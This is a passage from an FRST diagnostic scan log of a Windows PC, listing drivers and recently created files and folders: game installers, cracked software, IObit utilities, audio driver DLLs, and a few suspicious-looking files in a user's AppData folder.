R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)
R1 YSDrv; C:\Program Files (x86)\Bignox\BigNoxVM\RT\YSDrv.sys [270608 2017-07-17] (BigNox Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)
 
 
==================== Um Mês Criados arquivos e pastas ========
 
(Se uma entrada for incluída na fixlist, o arquivo/pasta será movido.)
 
2017-08-03 14:20 - 2017-08-03 15:34 - 000023347 _____ C:\Users\Hercílio\Desktop\FRST.txt
2017-08-03 14:18 - 2017-08-03 14:18 - 002381312 _____ (Farbar) C:\Users\Hercílio\Downloads\FRST64 (1).exe
2017-08-03 14:18 - 2017-08-03 14:18 - 002381312 _____ (Farbar) C:\Users\Hercílio\Desktop\FRST64.exe
2017-08-03 13:08 - 2017-08-03 13:08 - 000003040 _____ C:\WINDOWS\System32\Tasks\Driver Booster SkipUAC (Hercílio)
2017-08-03 11:15 - 2017-08-03 11:15 - 001835008 _____ C:\Users\Hercílio\AppData\Roaming\pxese.exe
2017-08-03 08:19 - 2017-08-03 08:19 - 000936976 _____ C:\Users\Hercílio\AppData\Roaming\F348644F8C8E38493023A2CA41BE1BED
2017-08-03 08:19 - 2017-08-03 08:19 - 000253456 _____ C:\Users\Hercílio\AppData\Roaming\E7BD4BE3219227505EC81A001EF0D262
2017-08-03 08:19 - 2017-08-03 08:19 - 000245264 _____ C:\Users\Hercílio\AppData\Roaming\766304432F4B4AF71668BA8EE91BAB73
2017-08-03 08:19 - 2017-08-03 08:19 - 000232464 _____ C:\Users\Hercílio\AppData\Roaming\F70555010177884C9C2184467F078255
2017-08-03 08:19 - 2017-08-03 08:19 - 000047120 _____ C:\Users\Hercílio\AppData\Roaming\78DF6D034C85415260CC2E9412198DB6
2017-08-03 08:16 - 2017-08-03 12:53 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\tor
2017-08-03 07:57 - 2017-08-03 08:03 - 000000000 ____D C:\FRST
2017-08-03 07:55 - 2017-08-03 07:55 - 001777664 _____ (Farbar) C:\Users\Hercílio\Downloads\FRST.exe
2017-08-01 08:46 - 2017-08-01 08:46 - 000000000 ____D C:\Users\Hercílio\Downloads\EnderalInstall_EN
2017-07-31 22:25 - 2017-07-31 23:17 - 4132997235 _____ C:\Users\Hercílio\Downloads\EnderalInstall_EN.gz
2017-07-31 22:25 - 2017-07-31 22:25 - 000020704 _____ C:\Users\Hercílio\Downloads\EnderalInstall_EN.torrent
2017-07-31 15:48 - 2017-07-31 15:48 - 000002570 _____ C:\Users\Hercílio\Desktop\Skyrim (SKSE).lnk
2017-07-31 15:47 - 2017-07-31 15:47 - 000362812 _____ C:\Users\Hercílio\Downloads\skse_1_07_03_installer.exe
2017-07-31 14:48 - 2017-07-31 14:48 - 000000000 ____D C:\Users\Hercílio\AppData\LocalLow\Dire Wolf Digital
2017-07-31 14:26 - 2017-07-31 14:29 - 000000000 ____D C:\Users\Hercílio\Documents\Nexus Mod Manager
2017-07-31 14:26 - 2017-07-31 14:26 - 006441096 _____ (Black Tree Gaming ) C:\Users\Hercílio\Downloads\Nexus Mod Manager-0.63.14.exe
2017-07-31 14:26 - 2017-07-31 14:26 - 000000943 _____ C:\Users\Public\Desktop\Nexus Mod Manager.lnk
2017-07-31 14:26 - 2017-07-31 14:26 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Black_Tree_Gaming
2017-07-31 14:26 - 2017-07-31 14:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nexus Mod Manager
2017-07-31 14:26 - 2017-07-31 14:26 - 000000000 ____D C:\Program Files\Nexus Mod Manager
2017-07-31 13:30 - 2017-07-31 13:30 - 000000257 _____ C:\Users\Hercílio\Desktop\The Elder Scrolls Legends.url
2017-07-31 13:27 - 2017-07-31 13:30 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Bethesda.net Launcher
2017-07-31 13:25 - 2017-08-01 08:50 - 000000000 ____D C:\Program Files (x86)\Bethesda.net Launcher
2017-07-31 13:25 - 2017-07-31 13:25 - 009048248 _____ (Bethesda Softworks ) C:\Users\Hercílio\Downloads\BethesdaNetLauncher_Setup.exe
2017-07-31 13:25 - 2017-07-31 13:25 - 000001241 _____ C:\Users\Public\Desktop\Bethesda.net Launcher.lnk
2017-07-31 13:25 - 2017-07-31 13:25 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda.net Launcher
2017-07-28 22:51 - 2017-07-28 22:52 - 002267136 _____ C:\Users\Hercílio\Downloads\c6d4ec44-12d1-4dc1-8cfb-20cc41737de7.tmp
2017-07-27 15:31 - 2017-07-27 16:07 - 077045332 _____ C:\Users\Hercílio\Downloads\PUNCH_Hajimete_no_Gal_-_02_MQ.mp4
2017-07-23 23:22 - 2017-07-23 23:22 - 000002053 _____ C:\Users\Hercílio\Desktop\Crashlands.exe.lnk
2017-07-23 13:53 - 2017-07-23 14:04 - 000000000 ____D C:\Users\Hercílio\Downloads\The.Banner.Saga-RELOADED
2017-07-23 11:15 - 2017-07-23 11:15 - 000000000 ____D C:\Users\Hercílio\Downloads\Crashlands.v1.2.3.0.Incl.Soundtrack
2017-07-23 09:09 - 2017-07-23 09:48 - 517766079 _____ C:\Users\Hercílio\Downloads\Crashlands.v1.2.3.0.Incl.Soundtrack.rar
2017-07-21 09:18 - 2017-07-21 09:18 - 004490460 _____ C:\Users\Hercílio\Downloads\Mini-Warriors-Hack-Tool-AndroidiOS.rar
2017-07-20 10:54 - 2017-07-20 10:54 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\MobiKin
2017-07-20 10:54 - 2017-07-20 10:54 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\MobiKin
2017-07-20 10:54 - 2017-07-20 10:54 - 000000000 ____D C:\Program Files (x86)\MobiKin
2017-07-20 10:52 - 2017-07-20 10:53 - 014455408 _____ C:\Users\Hercílio\Downloads\mobikin-doctor-for-android.exe
2017-07-20 10:50 - 2017-07-20 10:50 - 000000000 ____D C:\Users\Todos os Usuários\wsr
2017-07-20 10:50 - 2017-07-20 10:50 - 000000000 ____D C:\ProgramData\wsr
2017-07-20 10:37 - 2017-07-20 10:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Wondershare
2017-07-20 10:36 - 2017-07-20 10:37 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Wondershare
2017-07-20 10:36 - 2015-02-27 10:35 - 000000232 _____ C:\WINDOWS\SysWOW64\dllhost.exe.config
2017-07-20 10:29 - 2017-07-20 10:30 - 000000000 ____D C:\Users\Public\Documents\Wondershare
2017-07-20 10:29 - 2017-07-20 10:29 - 001164944 _____ C:\Users\Hercílio\Downloads\drfone-for-android_setup_full1546.exe
2017-07-20 10:19 - 2017-07-20 10:54 - 000000000 ____D C:\Users\Todos os Usuários\Wondershare
2017-07-20 10:19 - 2017-07-20 10:54 - 000000000 ____D C:\ProgramData\Wondershare
2017-07-20 10:19 - 2017-07-20 10:54 - 000000000 ____D C:\Program Files (x86)\Wondershare
2017-07-20 10:19 - 2017-07-20 10:19 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Wondershare
2017-07-20 10:16 - 2017-07-20 10:18 - 000000000 ____D C:\Users\Hercílio\Downloads\Wondershare Data Recovery 5.0.0.5 FINAL + Crack [TechTools.net]
2017-07-20 10:15 - 2017-07-20 10:15 - 022790320 _____ (EaseUS ) C:\Users\Hercílio\Downloads\drw_trial.exe
2017-07-19 22:00 - 2017-07-19 22:00 - 000003272 _____ C:\WINDOWS\System32\Tasks\PCDoctorBackgroundMonitorTask-Delay
2017-07-19 14:07 - 2017-07-19 14:12 - 085787222 _____ C:\Users\Hercílio\Downloads\PUNCH_Knights_and_Magic_-_03_MQ.mp4
2017-07-19 10:17 - 2017-07-19 10:17 - 000873037 _____ C:\Users\Hercílio\Downloads\leomoon-cpu-v.zip
2017-07-18 00:13 - 2017-07-18 00:17 - 092073258 _____ C:\Users\Hercílio\Downloads\PUNCH_Boku_no_Hero_Academia_2_-_15_MQ.mp4
2017-07-17 07:50 - 2017-07-23 13:56 - 000000000 ____D C:\Users\Hercílio\.android
2017-07-17 07:49 - 2017-07-23 13:55 - 000000000 ____D C:\Users\Hercílio\vmlogs
2017-07-17 07:49 - 2017-07-23 13:55 - 000000000 ____D C:\Users\Hercílio\.BigNox
2017-07-17 07:49 - 2017-07-17 07:49 - 000001129 _____ C:\Users\Hercílio\Desktop\Multi-Drive.lnk
2017-07-17 07:49 - 2017-07-17 07:49 - 000001038 _____ C:\Users\Hercílio\Desktop\Nox.lnk
2017-07-17 07:49 - 2017-07-17 07:49 - 000000045 _____ C:\Users\Hercílio\nuuid.ini
2017-07-17 07:49 - 2017-07-17 07:49 - 000000041 _____ C:\Users\Hercílio\inst.ini
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Users\Herc�lio\AppData\Local\Nox
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Users\Hercílio\Nox_share
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\Microsoft\Windows\Start Menu\Nox
2017-07-17 07:49 - 2017-07-17 07:49 - 000000000 ____D C:\Program Files (x86)\Bignox
2017-07-17 07:48 - 2017-07-17 07:48 - 000000000 ____D C:\Program Files (x86)\Nox
2017-07-17 07:47 - 2017-07-23 14:02 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Nox
2017-07-16 23:10 - 2017-07-16 23:16 - 295309704 _____ (Duodian Technology Co. Ltd.) C:\Users\Hercílio\Downloads\nox_setup_v3.8.3.1_full_intl.exe
2017-07-15 10:48 - 2017-07-15 10:48 - 000000000 ____D C:\Users\Todos os Usuários\Orbit
2017-07-15 10:48 - 2017-07-15 10:48 - 000000000 ____D C:\ProgramData\Orbit
2017-07-15 10:27 - 2017-07-15 10:27 - 000001556 _____ C:\Users\Hercílio\Desktop\Might and Magic Heroes VII.lnk
2017-07-15 10:27 - 2017-07-15 10:27 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Might and Magic Heroes VII
2017-07-15 10:06 - 2017-07-15 10:37 - 000000000 ____D C:\Program Files (x86)\Might and Magic Heroes VII
2017-07-15 09:11 - 2017-07-15 10:45 - 000000000 ____D C:\Program Files\Might and Magic Heroes VII
2017-07-14 19:48 - 2017-07-14 19:49 - 000000000 ____D C:\Users\Hercílio\Desktop\Programas
2017-07-14 19:35 - 2017-07-14 19:35 - 093810688 _____ C:\WINDOWS\system32\config\SOFTWARE.iobit
2017-07-14 19:35 - 2017-07-14 19:35 - 004177920 _____ C:\WINDOWS\system32\config\DEFAULT.iobit
2017-07-14 19:35 - 2017-07-14 19:35 - 000061440 _____ C:\WINDOWS\system32\config\SAM.iobit
2017-07-14 19:35 - 2017-07-14 19:35 - 000028672 _____ C:\WINDOWS\system32\config\SECURITY.iobit
2017-07-14 19:34 - 2017-07-14 19:34 - 000003392 _____ C:\WINDOWS\System32\Tasks\SuperbGameBoost
2017-07-14 19:34 - 2017-07-14 19:34 - 000000000 ____D C:\Users\Todos os Usuários\SuperBoost
2017-07-14 19:34 - 2017-07-14 19:34 - 000000000 ____D C:\ProgramData\SuperBoost
2017-07-14 19:33 - 2017-07-14 19:33 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\SuperBoost
2017-07-14 19:33 - 2017-07-14 19:33 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Superb Game Boost
2017-07-14 19:33 - 2017-07-14 19:33 - 000000000 ____D C:\Program Files (x86)\SuperBoost
2017-07-14 19:33 - 2016-01-29 15:21 - 000276800 _____ C:\WINDOWS\SysWOW64\D3DX8Wrapper.dll
2017-07-14 19:33 - 2016-01-29 15:21 - 000229184 _____ (easyhook.codeplex.com) C:\WINDOWS\SysWOW64\EasyHook32.dll
2017-07-14 19:29 - 2017-07-14 19:29 - 000480800 _____ (Intel® Corporation) C:\WINDOWS\system32\Drivers\IntcDAud.sys
2017-07-14 19:18 - 2017-07-14 19:18 - 004332032 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\RtCRU64.exe
2017-07-14 19:18 - 2017-07-14 19:18 - 000419296 _____ (Realsil Semiconductor Corporation) C:\WINDOWS\system32\Drivers\RtsUer.sys
2017-07-14 19:17 - 2017-07-14 19:17 - 000001115 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Waves MaxxAudioPro.lnk
2017-07-14 19:17 - 2017-07-14 19:17 - 000000000 ____D C:\Program Files\Waves
2017-07-14 19:12 - 2017-07-14 19:12 - 072520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCORES64.dat
2017-07-14 19:12 - 2017-07-14 19:12 - 009124224 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
2017-07-14 19:12 - 2017-07-14 19:12 - 007172912 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEP64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 007096184 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPP64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 003203584 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 003014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
2017-07-14 19:12 - 2017-07-14 19:12 - 002201600 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001965808 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPD64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001780616 _____ (DTS) C:\WINDOWS\system32\DTSS2SpeakerDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001591056 _____ (DTS) C:\WINDOWS\system32\DTSS2HeadphoneDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001508928 _____ (DTS) C:\WINDOWS\system32\DTSBoostDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 001353824 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000743960 _____ (DTS) C:\WINDOWS\system32\DTSBassEnhancementDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000727432 _____ (DTS) C:\WINDOWS\system32\DTSSymmetryDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000708312 _____ (DTS) C:\WINDOWS\system32\DTSVoiceClarityDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000689880 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000504304 _____ (DTS) C:\WINDOWS\system32\DTSNeoPCDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000447720 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EED64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000445400 _____ (DTS) C:\WINDOWS\system32\DTSLimiterDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000441264 _____ (DTS) C:\WINDOWS\system32\DTSGainCompensatorDLL64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000327456 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPO64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000272712 _____ (Dolby Laboratories) C:\WINDOWS\system32\DDPA64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000253896 _____ (DTS) C:\WINDOWS\system32\DTSGFXAPO64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000253864 _____ (DTS) C:\WINDOWS\system32\DTSLFXAPO64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000252872 _____ (DTS) C:\WINDOWS\system32\DTSGFXAPONS64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000221960 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSH64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000209528 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSHP64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000164424 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkXInterface64.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000151784 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEL64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000134200 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEA64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
2017-07-14 19:12 - 2017-07-14 19:12 - 000084616 _____ (Dolby Laboratories) C:\WINDOWS\system32\R4EEG64A.dll
2017-07-14 19:06 - 2017-07-14 19:06 - 000003106 _____ C:\WINDOWS\System32\Tasks\IObitSelfCheckTask
2017-07-14 19:05 - 2017-07-14 19:06 - 000003266 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_AutoAnalyze
2017-07-14 19:05 - 2017-07-14 19:05 - 000003106 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_Startup
2017-07-14 19:05 - 2017-07-14 19:05 - 000003102 _____ C:\WINDOWS\System32\Tasks\SmartDefrag_Update
2017-07-14 19:05 - 2017-07-14 19:05 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Smart Defrag
2017-07-14 19:05 - 2017-03-09 13:53 - 000030744 _____ (IObit) C:\WINDOWS\system32\Drivers\SmartDefragDriver.sys
2017-07-14 19:05 - 2016-03-25 14:33 - 000128288 _____ (IObit) C:\WINDOWS\system32\IObitSmartDefragExtension.dll
2017-07-14 19:05 - 2016-03-22 11:02 - 000036824 _____ (IObit) C:\WINDOWS\system32\SmartDefragBootTime.exe
2017-07-14 19:04 - 2017-07-14 19:05 - 010908744 _____ (IObit ) C:\Users\Hercílio\Downloads\smart-defrag-setup.exe
2017-07-14 19:02 - 2017-07-14 19:02 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-14 19:02 - 2017-07-14 19:02 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-14 19:00 - 2017-07-14 19:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2017-07-14 19:00 - 2017-03-17 00:57 - 000044096 _____ (IObit.com) C:\WINDOWS\system32\Drivers\IMFCameraProtect.sys
2017-07-14 18:58 - 2017-07-14 22:17 - 000000000 ____D C:\WINDOWS\LastGood.Tmp
2017-07-14 18:58 - 2017-07-14 18:58 - 000378040 _____ (Intel Corporation) C:\WINDOWS\system32\ibtproppage.dll
2017-07-14 18:58 - 2017-07-14 18:58 - 000252936 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\ibtusb.sys
2017-07-14 18:57 - 2017-07-14 18:57 - 011221616 _____ C:\WINDOWS\system32\Drivers\Netwfw04.dat
2017-07-14 18:57 - 2017-07-14 18:57 - 003499776 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\Netwsw04.sys
2017-07-14 18:54 - 2017-07-14 18:54 - 000002504 _____ C:\WINDOWS\System32\Tasks\Uninstaller_SkipUac_Hercílio
2017-07-14 18:54 - 2017-07-14 18:54 - 000000306 _____ C:\WINDOWS\Tasks\Uninstaller_SkipUac_Hercílio.job
2017-07-14 18:54 - 2017-07-14 18:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Uninstaller
2017-07-14 18:51 - 2017-07-14 18:54 - 014435104 _____ (IObit) C:\Users\Hercílio\Downloads\iobituninstaller.exe
2017-07-14 18:51 - 2017-07-14 18:51 - 000046856 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\iaLPSS_GPIO.sys
2017-07-14 18:48 - 2017-07-14 18:48 - 000000000 ____D C:\Users\Todos os Usuários\{74E9F814-C737-42CC-B721-DBBC4059367A}
2017-07-14 18:48 - 2017-07-14 18:48 - 000000000 ____D C:\ProgramData\{74E9F814-C737-42CC-B721-DBBC4059367A}
2017-07-14 18:47 - 2017-07-14 18:47 - 000003116 _____ C:\WINDOWS\System32\Tasks\ASC10_PerformanceMonitor
2017-07-14 18:47 - 2017-07-14 18:47 - 000002916 _____ C:\WINDOWS\System32\Tasks\ASC10_SkipUac_Hercílio
2017-07-14 18:47 - 2017-07-14 18:47 - 000000000 ____D C:\WINDOWS\Tasks\ImCleanDisabled
2017-07-14 18:47 - 2017-07-14 18:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Advanced SystemCare
2017-07-14 18:43 - 2017-07-30 10:51 - 000000000 ____D C:\Users\Todos os Usuários\ProductData
2017-07-14 18:43 - 2017-07-30 10:51 - 000000000 ____D C:\ProgramData\ProductData
2017-07-14 18:43 - 2017-07-14 18:43 - 000000000 ____D C:\WINDOWS\IObit
2017-07-14 18:42 - 2017-07-14 19:05 - 000000000 ____D C:\Program Files (x86)\IObit
2017-07-14 18:42 - 2017-07-14 18:48 - 000000000 ____D C:\Users\Hercílio\AppData\LocalLow\IObit
2017-07-14 18:42 - 2017-07-14 18:42 - 000027552 _____ (REALiX™) C:\WINDOWS\SysWOW64\Drivers\HWiNFO64A.SYS
2017-07-14 18:42 - 2017-07-14 18:42 - 000003390 _____ C:\WINDOWS\System32\Tasks\Driver Booster Scheduler
2017-07-14 18:42 - 2017-07-14 18:42 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Driver Booster 4
2017-07-14 18:41 - 2017-08-03 11:03 - 000000000 ____D C:\Users\Todos os Usuários\IObit
2017-07-14 18:41 - 2017-08-03 11:03 - 000000000 ____D C:\ProgramData\IObit
2017-07-14 18:41 - 2017-07-14 19:05 - 000000000 ____D C:\Users\Hercílio\AppData\Roaming\IObit
2017-07-14 18:41 - 2017-07-14 18:41 - 015721672 _____ (IObit ) C:\Users\Hercílio\Downloads\driver_booster_setup.exe
2017-07-14 18:39 - 2017-07-14 18:41 - 039514624 _____ (IObit ) C:\Users\Hercílio\Downloads\advanced-systemcare-setup.exe
2017-07-14 17:51 - 2017-07-14 17:51 - 000000000 ____D C:\Users\Hercílio\Downloads\IObit Driver Booster Pro 3.3.0.744 FINAL + Crack
2017-07-14 17:38 - 2017-07-14 18:18 - 000000000 ____D C:\Users\Hercílio\Downloads\Might and Magic Heroes VII + All Updates + Crack
2017-07-14 14:56 - 2017-07-14 14:57 - 000000000 ____D C:\Users\Hercílio\Downloads\Doc_Skills_2_1_en
2017-07-14 14:55 - 2017-07-14 14:56 - 000877919 _____ C:\Users\Hercílio\Downloads\Doc_Skills_2_1_en.rar
2017-07-14 14:01 - 2017-07-14 14:01 - 000000006 _____ C:\Users\Hercílio\Documents\mt-e_hook.txt
2017-07-14 13:52 - 2017-07-14 13:52 - 005919905 _____ C:\Users\Hercílio\Downloads\mt-x_setup.rar
2017-07-14 13:52 - 2017-07-14 13:52 - 000000000 ____D C:\Users\Hercílio\Downloads\mt-x_setup
2017-07-14 13:06 - 2017-07-14 13:11 - 000000000 ____D C:\Users\Hercílio\Downloads\maps
2017-07-14 13:04 - 2017-07-14 13:04 - 001570966 _____ C:\Users\Hercílio\Downloads\beowulf_pride_is_the_curse_509.zip
2017-07-14 12:40 - 2017-07-14 12:40 - 000000000 ____D C:\Users\Hercílio\Downloads\Skillwheel
2017-07-14 12:39 - 2017-07-14 12:39 - 002368803 _____ C:\Users\Hercílio\Downloads\Skillwheel.zip
2017-07-14 10:39 - 2017-08-03 11:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KMSpico
2017-07-14 10:39 - 2017-07-14 10:39 - 000004608 _____ C:\WINDOWS\SECOH-QAD.exe
2017-07-14 10:39 - 2017-07-14 10:39 - 000003584 _____ C:\WINDOWS\SECOH-QAD.dll
2017-07-14 10:38 - 2010-12-05 23:16 - 000090112 _____ (Vestris Inc.) C:\WINDOWS\system32\Vestris.ResourceLib.dll
2017-07-14 10:36 - 2017-07-14 10:37 - 000000000 ____D C:\Users\Hercílio\Downloads\KMSpico 10.1.8 FINAL + Portable (Office and Windows 10 Activator) [TechTools]
2017-07-14 10:36 - 2017-07-14 10:36 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of Might and Magic V - Tribes of the East [GOG.com]
2017-07-14 10:29 - 2017-07-14 10:42 - 000000000 ____D C:\Program Files (x86)\HoMM 5 - Tribes of the East
2017-07-14 09:52 - 2017-07-14 09:52 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Heroes of Might and Magic V [GOG.com]
2017-07-14 09:50 - 2017-07-14 09:50 - 000000000 ____D C:\Users\Hercílio\Documents\NeocoreGames
2017-07-14 09:49 - 2017-07-14 13:11 - 000000000 ____D C:\Program Files (x86)\Heroes of Might and Magic V
2017-07-14 09:46 - 2017-07-14 09:46 - 000000000 ____D C:\Users\Hercílio\AppData\Local\Deployment
2017-07-14 09:09 - 2017-07-14 10:31 - 000000000 ____D C:\Users\Hercílio\Downloads\Heroes of Might and Magic V Bundle [GOG]
2017-07-13 19:40 - 2017-07-13 19:42 - 054053699 _____ C:\Users\Hercílio\Downloads\hmm6_1.1_efigs.exe
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.4.ALL.RELOADED.NODVD
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.ALL.RELOADED.NODVD
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.1.ALL.RELOADED.NODVD
2017-07-13 19:37 - 2017-07-13 19:37 - 000000000 ____D C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.1.ALL.PROPHET.NODVD
2017-07-13 19:36 - 2017-07-13 19:37 - 011513131 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.7.1.GE.ALL.SKIDROW.NODVD.ZIPd
2017-07-13 19:34 - 2017-07-13 19:35 - 011361464 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.4.ALL.RELOADED.NODVD.ZIP
2017-07-13 19:32 - 2017-07-13 19:34 - 021756552 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.ALL.RELOADED.NODVD.ZIP
2017-07-13 19:32 - 2017-07-13 19:34 - 011267261 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.2.1.ALL.RELOADED.NODVD.ZIP
2017-07-13 19:31 - 2017-07-13 19:32 - 011196271 _____ C:\Users\Hercílio\Downloads\HEROES.OF.MIGHT.AND.MAGIC.6.V1.1.ALL.PROPHET.NODVD.ZIP
2017-07-13 18:44 - 2017-07-14 09:09 - 000000000 ____D C:\Users\Hercílio\Downloads\Might.and.Magic.Heroes.VI.Shades.of.Darkness-RELOADED
2017-07-13 18:09 - 2017-07-13 18:11 - 050106404 _____ C:\Users\Hercílio\Downloads\PUNCH_Mahou_Tsukai_no_Yome_-_01_MQ.mp4
2017-07-13 17:05 - 2017-07-13 17:06 - 002364667 _____ C:\Users\Hercílio\Downloads\divided_country_56.zip
2017-07-13 10:34 - 2017-07-13 10:34 - 000000000 ____D C:\Users\Hercílio\Documents\Eek
2017-07-13 10:34 - 2017-07-13 10:34 - 000000000 ____D C:\Users\Hercílio\AppData\LocalLow\Eek
2017-07-13 10:15 - 2017-07-13 10:15 - 000000000 ____D C:\Users\Hercílio\Downloads\House.Party
2017-07-13 09:48 - 2017-07-13 09:58 - 1242919569 _____ C:\Users\Hercílio\Downloads\House.Party.zip
